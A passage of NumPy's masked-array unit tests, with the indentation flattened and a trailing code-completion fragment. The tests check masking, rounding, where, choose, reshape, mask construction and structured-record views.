x = [1, 2, 3]
mx = masked_equal(x, 3)
assert_equal(mx, x)
assert_equal(mx._mask, [0, 0, 1])
mx = masked_not_equal(x, 3)
assert_equal(mx, x)
assert_equal(mx._mask, [1, 1, 0])
def test_masked_equal_fill_value(self):
x = [1, 2, 3]
mx = masked_equal(x, 3)
assert_equal(mx._mask, [0, 0, 1])
assert_equal(mx.fill_value, 3)
def test_masked_where_condition(self):
# Tests masking functions.
x = array([1., 2., 3., 4., 5.])
x[2] = masked
assert_equal(masked_where(greater(x, 2), x), masked_greater(x, 2))
assert_equal(masked_where(greater_equal(x, 2), x),
masked_greater_equal(x, 2))
assert_equal(masked_where(less(x, 2), x), masked_less(x, 2))
assert_equal(masked_where(less_equal(x, 2), x),
masked_less_equal(x, 2))
assert_equal(masked_where(not_equal(x, 2), x), masked_not_equal(x, 2))
assert_equal(masked_where(equal(x, 2), x), masked_equal(x, 2))
assert_equal(masked_where(not_equal(x, 2), x), masked_not_equal(x, 2))
assert_equal(masked_where([1, 1, 0, 0, 0], [1, 2, 3, 4, 5]),
[99, 99, 3, 4, 5])
def test_masked_where_oddities(self):
# Tests some generic features.
atest = ones((10, 10, 10), dtype=float)
btest = zeros(atest.shape, MaskType)
ctest = masked_where(btest, atest)
assert_equal(atest, ctest)
def test_masked_where_shape_constraint(self):
a = arange(10)
try:
test = masked_equal(1, a)
except IndexError:
pass
else:
raise AssertionError("Should have failed...")
test = masked_equal(a, 1)
assert_equal(test.mask, [0, 1, 0, 0, 0, 0, 0, 0, 0, 0])
def test_masked_where_structured(self):
# test that masked_where on a structured array sets a structured
# mask (see issue #2972)
a = np.zeros(10, dtype=[("A", "<f2"), ("B", "<f4")])
am = np.ma.masked_where(a["A"] < 5, a)
assert_equal(am.mask.dtype.names, am.dtype.names)
assert_equal(am["A"],
np.ma.masked_array(np.zeros(10), np.ones(10)))
def test_masked_otherfunctions(self):
assert_equal(masked_inside(list(range(5)), 1, 3),
[0, 199, 199, 199, 4])
assert_equal(masked_outside(list(range(5)), 1, 3), [199, 1, 2, 3, 199])
assert_equal(masked_inside(array(list(range(5)),
mask=[1, 0, 0, 0, 0]), 1, 3).mask,
[1, 1, 1, 1, 0])
assert_equal(masked_outside(array(list(range(5)),
mask=[0, 1, 0, 0, 0]), 1, 3).mask,
[1, 1, 0, 0, 1])
assert_equal(masked_equal(array(list(range(5)),
mask=[1, 0, 0, 0, 0]), 2).mask,
[1, 0, 1, 0, 0])
assert_equal(masked_not_equal(array([2, 2, 1, 2, 1],
mask=[1, 0, 0, 0, 0]), 2).mask,
[1, 0, 1, 0, 1])
def test_round(self):
a = array([1.23456, 2.34567, 3.45678, 4.56789, 5.67890],
mask=[0, 1, 0, 0, 0])
assert_equal(a.round(), [1., 2., 3., 5., 6.])
assert_equal(a.round(1), [1.2, 2.3, 3.5, 4.6, 5.7])
assert_equal(a.round(3), [1.235, 2.346, 3.457, 4.568, 5.679])
b = empty_like(a)
a.round(out=b)
assert_equal(b, [1., 2., 3., 5., 6.])
x = array([1., 2., 3., 4., 5.])
c = array([1, 1, 1, 0, 0])
x[2] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
c[0] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
assert_(z[0] is masked)
assert_(z[1] is not masked)
assert_(z[2] is masked)
def test_round_with_output(self):
# Testing round with an explicit output
xm = array(np.random.uniform(0, 10, 12)).reshape(3, 4)
xm[:, 0] = xm[0] = xm[-1, -1] = masked
# A ndarray as explicit input
output = np.empty((3, 4), dtype=float)
output.fill(-9999)
result = np.round(xm, decimals=2, out=output)
# ... the result should be the given output
self.assertTrue(result is output)
assert_equal(result, xm.round(decimals=2, out=output))
output = empty((3, 4), dtype=float)
result = xm.round(decimals=2, out=output)
self.assertTrue(result is output)
def test_round_with_scalar(self):
# Testing round with scalar/zero dimension input
# GH issue 2244
a = array(1.1, mask=[False])
assert_equal(a.round(), 1)
a = array(1.1, mask=[True])
assert_(a.round() is masked)
a = array(1.1, mask=[False])
output = np.empty(1, dtype=float)
output.fill(-9999)
a.round(out=output)
assert_equal(output, 1)
a = array(1.1, mask=[False])
output = array(-9999., mask=[True])
a.round(out=output)
assert_equal(output[()], 1)
a = array(1.1, mask=[True])
output = array(-9999., mask=[False])
a.round(out=output)
assert_(output[()] is masked)
def test_identity(self):
a = identity(5)
self.assertTrue(isinstance(a, MaskedArray))
assert_equal(a, np.identity(5))
def test_power(self):
x = -1.1
assert_almost_equal(power(x, 2.), 1.21)
self.assertTrue(power(x, masked) is masked)
x = array([-1.1, -1.1, 1.1, 1.1, 0.])
b = array([0.5, 2., 0.5, 2., -1.], mask=[0, 0, 0, 0, 1])
y = power(x, b)
assert_almost_equal(y, [0, 1.21, 1.04880884817, 1.21, 0.])
assert_equal(y._mask, [1, 0, 0, 0, 1])
b.mask = nomask
y = power(x, b)
assert_equal(y._mask, [1, 0, 0, 0, 1])
z = x ** b
assert_equal(z._mask, y._mask)
assert_almost_equal(z, y)
assert_almost_equal(z._data, y._data)
x **= b
assert_equal(x._mask, y._mask)
assert_almost_equal(x, y)
assert_almost_equal(x._data, y._data)
def test_power_w_broadcasting(self):
# Test power w/ broadcasting
a2 = np.array([[1., 2., 3.], [4., 5., 6.]])
a2m = array(a2, mask=[[1, 0, 0], [0, 0, 1]])
b1 = np.array([2, 4, 3])
b2 = np.array([b1, b1])
b2m = array(b2, mask=[[0, 1, 0], [0, 1, 0]])
ctrl = array([[1 ** 2, 2 ** 4, 3 ** 3], [4 ** 2, 5 ** 4, 6 ** 3]],
mask=[[1, 1, 0], [0, 1, 1]])
# No broadcasting, base & exp w/ mask
test = a2m ** b2m
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
# No broadcasting, base w/ mask, exp w/o mask
test = a2m ** b2
assert_equal(test, ctrl)
assert_equal(test.mask, a2m.mask)
# No broadcasting, base w/o mask, exp w/ mask
test = a2 ** b2m
assert_equal(test, ctrl)
assert_equal(test.mask, b2m.mask)
ctrl = array([[2 ** 2, 4 ** 4, 3 ** 3], [2 ** 2, 4 ** 4, 3 ** 3]],
mask=[[0, 1, 0], [0, 1, 0]])
test = b1 ** b2m
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
test = b2m ** b1
assert_equal(test, ctrl)
assert_equal(test.mask, ctrl.mask)
def test_where(self):
# Test the where function
x = np.array([1., 1., 1., -2., pi/2.0, 4., 5., -10., 10., 1., 2., 3.])
y = np.array([5., 0., 3., 2., -1., -4., 0., -10., 10., 1., 0., 3.])
m1 = [1, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 0]
m2 = [0, 0, 1, 0, 0, 1, 1, 0, 0, 0, 0, 1]
xm = masked_array(x, mask=m1)
ym = masked_array(y, mask=m2)
xm.set_fill_value(1e+20)
d = where(xm > 2, xm, -9)
assert_equal(d, [-9., -9., -9., -9., -9., 4.,
-9., -9., 10., -9., -9., 3.])
assert_equal(d._mask, xm._mask)
d = where(xm > 2, -9, ym)
assert_equal(d, [5., 0., 3., 2., -1., -9.,
-9., -10., -9., 1., 0., -9.])
assert_equal(d._mask, [1, 0, 1, 0, 0, 0, 1, 0, 0, 0, 0, 0])
d = where(xm > 2, xm, masked)
assert_equal(d, [-9., -9., -9., -9., -9., 4.,
-9., -9., 10., -9., -9., 3.])
tmp = xm._mask.copy()
tmp[(xm <= 2).filled(True)] = True
assert_equal(d._mask, tmp)
ixm = xm.astype(int)
d = where(ixm > 2, ixm, masked)
assert_equal(d, [-9, -9, -9, -9, -9, 4, -9, -9, 10, -9, -9, 3])
assert_equal(d.dtype, ixm.dtype)
def test_where_object(self):
a = np.array(None)
b = masked_array(None)
r = b.copy()
assert_equal(np.ma.where(True, a, a), r)
assert_equal(np.ma.where(True, b, b), r)
def test_where_with_masked_choice(self):
x = arange(10)
x[3] = masked
c = x >= 8
# Set False to masked
z = where(c, x, masked)
assert_(z.dtype is x.dtype)
assert_(z[3] is masked)
assert_(z[4] is masked)
assert_(z[7] is masked)
assert_(z[8] is not masked)
assert_(z[9] is not masked)
assert_equal(x, z)
# Set True to masked
z = where(c, masked, x)
assert_(z.dtype is x.dtype)
assert_(z[3] is masked)
assert_(z[4] is not masked)
assert_(z[7] is not masked)
assert_(z[8] is masked)
assert_(z[9] is masked)
def test_where_with_masked_condition(self):
x = array([1., 2., 3., 4., 5.])
c = array([1, 1, 1, 0, 0])
x[2] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
c[0] = masked
z = where(c, x, -x)
assert_equal(z, [1., 2., 0., -4., -5])
assert_(z[0] is masked)
assert_(z[1] is not masked)
assert_(z[2] is masked)
x = arange(1, 6)
x[-1] = masked
y = arange(1, 6) * 10
y[2] = masked
c = array([1, 1, 1, 0, 0], mask=[1, 0, 0, 0, 0])
cm = c.filled(1)
z = where(c, x, y)
zm = where(cm, x, y)
assert_equal(z, zm)
assert_(getmask(zm) is nomask)
assert_equal(zm, [1, 2, 3, 40, 50])
z = where(c, masked, 1)
assert_equal(z, [99, 99, 99, 1, 1])
z = where(c, 1, masked)
assert_equal(z, [99, 1, 1, 99, 99])
def test_where_type(self):
# Test the type conservation with where
x = np.arange(4, dtype=np.int32)
y = np.arange(4, dtype=np.float32) * 2.2
test = where(x > 1.5, y, x).dtype
control = np.find_common_type([np.int32, np.float32], [])
assert_equal(test, control)
def test_choose(self):
# Test choose
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
chosen = choose([2, 3, 1, 0], choices)
assert_equal(chosen, array([20, 31, 12, 3]))
chosen = choose([2, 4, 1, 0], choices, mode='clip')
assert_equal(chosen, array([20, 31, 12, 3]))
chosen = choose([2, 4, 1, 0], choices, mode='wrap')
assert_equal(chosen, array([20, 1, 12, 3]))
# Check with some masked indices
indices_ = array([2, 4, 1, 0], mask=[1, 0, 0, 1])
chosen = choose(indices_, choices, mode='wrap')
assert_equal(chosen, array([99, 1, 12, 99]))
assert_equal(chosen.mask, [1, 0, 0, 1])
# Check with some masked choices
choices = array(choices, mask=[[0, 0, 0, 1], [1, 1, 0, 1],
[1, 0, 0, 0], [0, 0, 0, 0]])
indices_ = [2, 3, 1, 0]
chosen = choose(indices_, choices, mode='wrap')
assert_equal(chosen, array([20, 31, 12, 3]))
assert_equal(chosen.mask, [1, 0, 0, 1])
def test_choose_with_out(self):
# Test choose with an explicit out keyword
choices = [[0, 1, 2, 3], [10, 11, 12, 13],
[20, 21, 22, 23], [30, 31, 32, 33]]
store = empty(4, dtype=int)
chosen = choose([2, 3, 1, 0], choices, out=store)
assert_equal(store, array([20, 31, 12, 3]))
self.assertTrue(store is chosen)
# Check with some masked indices + out
store = empty(4, dtype=int)
indices_ = array([2, 3, 1, 0], mask=[1, 0, 0, 1])
chosen = choose(indices_, choices, mode='wrap', out=store)
assert_equal(store, array([99, 31, 12, 99]))
assert_equal(store.mask, [1, 0, 0, 1])
# Check with some masked choices + out ina ndarray !
choices = array(choices, mask=[[0, 0, 0, 1], [1, 1, 0, 1],
[1, 0, 0, 0], [0, 0, 0, 0]])
indices_ = [2, 3, 1, 0]
store = empty(4, dtype=int).view(ndarray)
chosen = choose(indices_, choices, mode='wrap', out=store)
assert_equal(store, array([999999, 31, 12, 999999]))
def test_reshape(self):
a = arange(10)
a[0] = masked
# Try the default
b = a.reshape((5, 2))
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['C'])
# Try w/ arguments as list instead of tuple
b = a.reshape(5, 2)
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['C'])
# Try w/ order
b = a.reshape((5, 2), order='F')
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['F'])
# Try w/ order
b = a.reshape(5, 2, order='F')
assert_equal(b.shape, (5, 2))
self.assertTrue(b.flags['F'])
c = np.reshape(a, (2, 5))
self.assertTrue(isinstance(c, MaskedArray))
assert_equal(c.shape, (2, 5))
self.assertTrue(c[0, 0] is masked)
self.assertTrue(c.flags['C'])
def test_make_mask_descr(self):
# Test make_mask_descr
# Flexible
ntype = [('a', np.float), ('b', np.float)]
test = make_mask_descr(ntype)
assert_equal(test, [('a', np.bool), ('b', np.bool)])
# Standard w/ shape
ntype = (np.float, 2)
test = make_mask_descr(ntype)
assert_equal(test, (np.bool, 2))
# Standard standard
ntype = np.float
test = make_mask_descr(ntype)
assert_equal(test, np.dtype(np.bool))
# Nested
ntype = [('a', np.float), ('b', [('ba', np.float), ('bb', np.float)])]
test = make_mask_descr(ntype)
control = np.dtype([('a', 'b1'), ('b', [('ba', 'b1'), ('bb', 'b1')])])
assert_equal(test, control)
# Named+ shape
ntype = [('a', (np.float, 2))]
test = make_mask_descr(ntype)
assert_equal(test, np.dtype([('a', (np.bool, 2))]))
# 2 names
ntype = [(('A', 'a'), float)]
test = make_mask_descr(ntype)
assert_equal(test, np.dtype([(('A', 'a'), bool)]))
def test_make_mask(self):
# Test make_mask
# w/ a list as an input
mask = [0, 1]
test = make_mask(mask)
assert_equal(test.dtype, MaskType)
assert_equal(test, [0, 1])
# w/ a ndarray as an input
mask = np.array([0, 1], dtype=np.bool)
test = make_mask(mask)
assert_equal(test.dtype, MaskType)
assert_equal(test, [0, 1])
# w/ a flexible-type ndarray as an input - use default
mdtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1)], dtype=mdtype)
test = make_mask(mask)
assert_equal(test.dtype, MaskType)
assert_equal(test, [1, 1])
# w/ a flexible-type ndarray as an input - use input dtype
mdtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1)], dtype=mdtype)
test = make_mask(mask, dtype=mask.dtype)
assert_equal(test.dtype, mdtype)
assert_equal(test, mask)
# w/ a flexible-type ndarray as an input - use input dtype
mdtype = [('a', np.float), ('b', np.float)]
bdtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1)], dtype=mdtype)
test = make_mask(mask, dtype=mask.dtype)
assert_equal(test.dtype, bdtype)
assert_equal(test, np.array([(0, 0), (0, 1)], dtype=bdtype))
def test_mask_or(self):
# Initialize
mtype = [('a', np.bool), ('b', np.bool)]
mask = np.array([(0, 0), (0, 1), (1, 0), (0, 0)], dtype=mtype)
# Test using nomask as input
test = mask_or(mask, nomask)
assert_equal(test, mask)
test = mask_or(nomask, mask)
assert_equal(test, mask)
# Using False as input
test = mask_or(mask, False)
assert_equal(test, mask)
# Using True as input. Won't work, but keep it for the kicks
# test = mask_or(mask, True)
# control = np.array([(1, 1), (1, 1), (1, 1), (1, 1)], dtype=mtype)
# assert_equal(test, control)
# Using another array w / the same dtype
other = np.array([(0, 1), (0, 1), (0, 1), (0, 1)], dtype=mtype)
test = mask_or(mask, other)
control = np.array([(0, 1), (0, 1), (1, 1), (0, 1)], dtype=mtype)
assert_equal(test, control)
# Using another array w / a different dtype
othertype = [('A', np.bool), ('B', np.bool)]
other = np.array([(0, 1), (0, 1), (0, 1), (0, 1)], dtype=othertype)
try:
test = mask_or(mask, other)
except ValueError:
pass
# Using nested arrays
dtype = [('a', np.bool), ('b', [('ba', np.bool), ('bb', np.bool)])]
amask = np.array([(0, (1, 0)), (0, (1, 0))], dtype=dtype)
bmask = np.array([(1, (0, 1)), (0, (0, 0))], dtype=dtype)
cntrl = np.array([(1, (1, 1)), (0, (1, 0))], dtype=dtype)
assert_equal(mask_or(amask, bmask), cntrl)
def test_flatten_mask(self):
# Tests flatten mask
# Standarad dtype
mask = np.array([0, 0, 1], dtype=np.bool)
assert_equal(flatten_mask(mask), mask)
# Flexible dtype
mask = np.array([(0, 0), (0, 1)], dtype=[('a', bool), ('b', bool)])
test = flatten_mask(mask)
control = np.array([0, 0, 0, 1], dtype=bool)
assert_equal(test, control)
mdtype = [('a', bool), ('b', [('ba', bool), ('bb', bool)])]
data = [(0, (0, 0)), (0, (0, 1))]
mask = np.array(data, dtype=mdtype)
test = flatten_mask(mask)
control = np.array([0, 0, 0, 0, 0, 1], dtype=bool)
assert_equal(test, control)
def test_on_ndarray(self):
# Test functions on ndarrays
a = np.array([1, 2, 3, 4])
m = array(a, mask=False)
test = anom(a)
assert_equal(test, m.anom())
test = reshape(a, (2, 2))
assert_equal(test, m.reshape(2, 2))
def test_compress(self):
# Test compress function on ndarray and masked array
# Address Github #2495.
arr = np.arange(8)
arr.shape = 4, 2
cond = np.array([True, False, True, True])
control = arr[[0, 2, 3]]
test = np.ma.compress(cond, arr, axis=0)
assert_equal(test, control)
marr = np.ma.array(arr)
test = np.ma.compress(cond, marr, axis=0)
assert_equal(test, control)
def test_compressed(self):
# Test ma.compressed function.
# Address gh-4026
a = np.ma.array([1, 2])
test = np.ma.compressed(a)
assert_(type(test) is np.ndarray)
# Test case when input data is ndarray subclass
class A(np.ndarray):
pass
a = np.ma.array(A(shape=0))
test = np.ma.compressed(a)
assert_(type(test) is A)
# Test that compress flattens
test = np.ma.compressed([[1],[2]])
assert_equal(test.ndim, 1)
test = np.ma.compressed([[[[[1]]]]])
assert_equal(test.ndim, 1)
# Test case when input is MaskedArray subclass
class M(MaskedArray):
pass
test = np.ma.compressed(M(shape=(0,1,2)))
assert_equal(test.ndim, 1)
# with .compessed() overriden
class M(MaskedArray):
def compressed(self):
return 42
test = np.ma.compressed(M(shape=(0,1,2)))
assert_equal(test, 42)
class TestMaskedFields(TestCase):
def setUp(self):
ilist = [1, 2, 3, 4, 5]
flist = [1.1, 2.2, 3.3, 4.4, 5.5]
slist = ['one', 'two', 'three', 'four', 'five']
ddtype = [('a', int), ('b', float), ('c', '|S8')]
mdtype = [('a', bool), ('b', bool), ('c', bool)]
mask = [0, 1, 0, 0, 1]
base = array(list(zip(ilist, flist, slist)), mask=mask, dtype=ddtype)
self.data = dict(base=base, mask=mask, ddtype=ddtype, mdtype=mdtype)
def test_set_records_masks(self):
base = self.data['base']
mdtype = self.data['mdtype']
# Set w/ nomask or masked
base.mask = nomask
assert_equal_records(base._mask, np.zeros(base.shape, dtype=mdtype))
base.mask = masked
assert_equal_records(base._mask, np.ones(base.shape, dtype=mdtype))
# Set w/ simple boolean
base.mask = False
assert_equal_records(base._mask, np.zeros(base.shape, dtype=mdtype))
base.mask = True
assert_equal_records(base._mask, np.ones(base.shape, dtype=mdtype))
# Set w/ list
base.mask = [0, 0, 0, 1, 1]
assert_equal_records(base._mask,
np.array([(x, x, x) for x in [0, 0, 0, 1, 1]],
dtype=mdtype))
def test_set_record_element(self):
# Check setting an element of a record)
base = self.data['base']
(base_a, base_b, base_c) = (base['a'], base['b'], base['c'])
base[0] = (pi, pi, 'pi')
assert_equal(base_a.dtype, int)
assert_equal(base_a._data, [3, 2, 3, 4, 5])
assert_equal(base_b.dtype, float)
assert_equal(base_b._data, [pi, 2.2, 3.3, 4.4, 5.5])
assert_equal(base_c.dtype, '|S8')
assert_equal(base_c._data,
asbytes_nested(['pi', 'two', 'three', 'four', 'five']))
def test_set_record_slice(self):
base = self.data['base']
(base_a, base_b, base_c) = (base['a'], base['b'], base['c'])
base[:3] = (pi, pi, 'pi')
assert_equal(base_a.dtype, int)
assert_equal(base_a._data, [3, 3, 3, 4, 5])
assert_equal(base_b.dtype, float)
assert_equal(base_b._data, [pi, pi, pi, 4.4, 5.5])
assert_equal(base_c.dtype, '|S8')
assert_equal(base_c._data,
asbytes_nested(['pi', 'pi', 'pi', 'four', 'five']))
def test_mask_element(self):
"Check record access"
base = self.data['base']
base[0] = masked
for n in ('a', 'b', 'c'):
assert_equal(base[n].mask, [1, 1, 0, 0, 1])
assert_equal(base[n]._data, base._data[n])
def test_getmaskarray(self):
# Test getmaskarray on flexible dtype
ndtype = [('a', int), ('b', float)]
test = empty(3, dtype=ndtype)
assert_equal(getmaskarray(test),
np.array([(0, 0), (0, 0), (0, 0)],
dtype=[('a', '|b1'), ('b', '|b1')]))
test[:] = masked
assert_equal(getmaskarray(test),
np.array([(1, 1), (1, 1), (1, 1)],
dtype=[('a', '|b1'), ('b', '|b1')]))
def test_view(self):
# Test view w/ flexible dtype
iterator = list(zip(np.arange(10), np.random.rand(10)))
data = np.array(iterator)
a = array(iterator, dtype=[('a', float), ('b', float)])
a.mask[0] = (1, 0)
controlmask = np.array([1] + 19 * [0], dtype=bool)
# Transform globally to simple dtype
test = a.view(float)
assert_equal(test, data.ravel())
assert_equal(test.mask, controlmask)
# Transform globally to dty
test = a.view((float, 2))
assert_equal(test, data)
assert_equal(test.mask, controlmask.reshape(-1, 2))
test = a.view((float, 2), np.matrix)
assert_equal(test, data)
self.assertTrue(isinstance(test, np.matrix))
def test_getitem(self):
ndtype = [('a', float), ('b', float)]
a = array(list(zip(np.random.rand(10), np.arange(10))), dtype=ndtype)
a.mask = np.array(list(zip([0, 0, 0, 0, 0, 0, 0, 0, 1, 1],
[1, 0, 0, 0, 0, 0, 0, 0, 1, 0])),
dtype=[('a', bool), ('b', bool)])
# No mask
self.assertTrue(isinstance(a[1], MaskedArray))
# One element masked
self.assertTrue(isinstance(a[0], MaskedArray))
assert_equal_records(a[0]._data, a._data[0])
assert_equal_records(a[0]._mask, a._mask[0])
# All element masked
self.assertTrue(isinstance(a[-2], MaskedArray))
assert_equal_records(a[-2]._data, a._data[-2])
assert_equal_records(a[-2]._mask, a._mask[-2])
def test_setitem(self):
# Issue 4866: check that one can set individual items in [record][col]
# and [col][record] order
ndtype = np.dtype([('a', float), ('b', int)])
ma = np.ma.MaskedArray([(1.0, 1), (2.0, 2)], dtype=ndtype)
ma['a'][1] = 3.0
assert_equal(ma['a'], np.array([1.0, 3.0]))
ma[1]['a'] = 4.0
assert_equal(ma['a'], np.array([1.0, 4.0]))
# Issue 2403
mdtype = np.dtype([('a', bool), ('b', bool)])
# soft mask
control = np.array([(False, True), (True, True)], dtype=mdtype)
a = np.ma.masked_all((2,), dtype=ndtype)
a['a'][0] = 2
assert_equal(a.mask, control)
a = np.ma.masked_all((2,), dtype=ndtype)
a[0]['a'] = 2
assert_equal(a.mask, control)
# hard mask
control = np.array([(True, True), (True, True)], dtype=mdtype)
a = np.ma.masked_all((2,), dtype=ndtype)
a.harden_mask()
a['a'][0] = 2
assert_equal(a.mask, control)
a = np.ma.masked_all((2,), dtype=ndtype)
a.harden_mask()
a[0]['a'] = 2
assert_equal(a.mask, control)
def test_element_len(self):
# check that len() works for mvoid (Github issue #576)
for rec in self.data['base']:
assert_equal(len(rec), len(self.data['ddtype']))
class TestMaskedView(TestCase):
def setUp(self):
iterator = list(zip(np.arange(10), np.random.rand(10)))
data = np.array(iterator)
a = array(iterator, dtype=[('a', float), ('b', float)])
a.mask[0] = (1, 0)
controlmask = np.array([1] + 19 * [0], dtype=bool)
self.data = (data, a, controlmask)
def test_view_to_nothing(self):
(data, a, controlmask) = self.data
test = a.view()
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test._data, a._data)
assert_equal(test._mask, a._mask)
def test_view_to_type(self):
(data, a, controlmask) = self.data
test = a.view(np.ndarray)
self.assertTrue(not isinstance(test, MaskedArray))
assert_equal(test, a._data)
assert_equal_records(test, data.view(a.dtype).squeeze())
def test_view_to_simple_dtype(self):
(data, a, controlmask) = self.data
# View globally
test = a.view(float)
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data.ravel())
assert_equal(test.mask, controlmask)
def test_view_to_flexible_dtype(self):
(data, a, controlmask) = self.data
test = a.view([('A', float), ('B', float)])
assert_equal(test.mask.dtype.names, ('A', 'B'))
assert_equal(test['A'], a['a'])
assert_equal(test['B'], a['b'])
test = a[0].view([('A', float), ('B', float)])
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test.mask.dtype.names, ('A', 'B'))
assert_equal(test['A'], a['a'][0])
assert_equal(test['B'], a['b'][0])
test = a[-1].view([('A', float), ('B', float)])
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test.dtype.names, ('A', 'B'))
assert_equal(test['A'], a['a'][-1])
assert_equal(test['B'], a['b'][-1])
def test_view_to_subdtype(self):
(data, a, controlmask) = self.data
# View globally
test = a.view((float, 2))
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data)
assert_equal(test.mask, controlmask.reshape(-1, 2))
# View on 1 masked element
test = a[0].view((float, 2))
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data[0])
assert_equal(test.mask, (1, 0))
# View on 1 unmasked element
test = a[-1].view((float, 2))
self.assertTrue(isinstance(test, MaskedArray))
assert_equal(test, data[-1])
def test_view_to_dtype_and_type(self):
(data, a, controlmask) = self.data
test = a.view((float, 2), np.matrix)
assert_equal(test, data)
self.assertTrue(isinstance(test, np.matrix))
self.assertTrue(not isinstance(test, MaskedArray))
def test_masked_array():
a = np.ma.array([0, 1, 2, 3], mask=[0, 0, 1, 0])
assert_equal(np.argwhere(a), [[1], [3]])
def test_append_masked_array():
a = np.ma.masked_equal([1,2,3], value=2)
b = np.ma.masked_equal([4,3,2], value=2)
result = np.ma.append(a, b)
expected_data = [1, 2, 3, 4, 3, 2]
expected_mask = [False, True, False, False, False, True]
assert_array_equal(result.data, expected_data)
assert_array_equal(result.mask, expected_mask)
a = np.ma.masked_all((2,2))
b = np.ma.ones((3,1))
result = np.ma.append(a, b)
expected_data = [1] * 3
expected_mask = [True] * 4 + [False] * 3
assert_array_equal(result.data[-3], expected_data)
assert_array_equal(result.mask, expected_mask)
result = np.ma.append(a, b, axis=None)
assert_array_equal(result.data[-3], expected_data)
assert_array_equal(result.mask, expected_mask)
def test_append_masked_array_along_axis():
a = np.ma.masked_equal([1,2,3], value=2)
b = np.ma.masked_values([[4, 5, 6], [7, 8, 9]], 7)
# When `axis` is specified, `values` must have the correct shape.
assert_raises(ValueError, np.ma.append, a, b, axis=0)
result = np.ma.append(a[np.newaxis,:], b, axis=0)
expected = np.ma.arange(1, 10)
expected[[1, 6]] = np.ma.masked
expected = expected.reshape((3,3))
assert_array_equal(result.data, expected.data)
assert_array_equal(result.mask, expected.mask)
def test_default_fill_value_complex():
# regression test for Python 3, where 'unicode' was not defined
assert default_fill_value(1 + 1j) == 1.e20 + 0.0j
###############################################################################
if __name__ == "__main__":
run_module_suite()<|fim▁end|>
|
# dtype is an ndarray sub-class and has a _fill_value attribute (by
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.